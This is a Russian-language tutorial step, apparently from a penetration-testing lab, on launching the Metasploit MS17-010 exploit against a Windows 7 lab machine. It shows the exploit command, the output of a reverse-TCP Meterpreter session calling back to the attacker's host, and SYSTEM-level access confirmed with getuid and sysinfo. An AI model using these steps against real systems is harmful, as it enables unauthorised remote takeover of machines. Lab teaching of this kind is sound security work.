Запуск эксплойта и установление сессии Meterpreter
На этом шаге, после настройки всех параметров, вы запустите эксплойт и получите контроль над целевой машиной.
Вся подготовка завершена. Эксплойт выбран, цель установлена, и полезная нагрузка выбрана. Чтобы запустить атаку, просто используйте команду exploit.
exploit
Metasploit попытается использовать уязвимость на цели. Вы увидите несколько сообщений о статусе выполнения. В случае успеха эксплойт доставит полезную нагрузку Meterpreter, и вы увидите сообщение, указывающее на "WIN!" и что открыта новая сессия.
[*] Started reverse TCP handler on 192.168.1.100:4444
[*] 192.168.1.101:445 - Connecting to target for exploitation.
[+] 192.168.1.101:445 - Connection established for exploitation.
...
[+] 192.168.1.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Sending stage (200774 bytes) to 192.168.1.101
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.101:49157) at 2023-10-27 10:30:00 -0400
meterpreter >
Приглашение meterpreter > означает успех! Теперь у вас есть удаленный шелл на машине жертвы. Чтобы продемонстрировать свой контроль, выполните команду getuid, чтобы увидеть, от имени какой учетной записи пользователя вы работаете.
getuid
Вывод должен быть следующим:
Server username: NT AUTHORITY\SYSTEM
NT AUTHORITY\SYSTEM — это наивысший уровень привилегий в системе Windows. Вы успешно скомпрометировали цель. Вы также можете выполнить команду sysinfo, чтобы получить информацию о системе.
sysinfo
Computer : WIN7-VICTIM
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
Поздравляем, вы успешно использовали эксплойт MS17-010.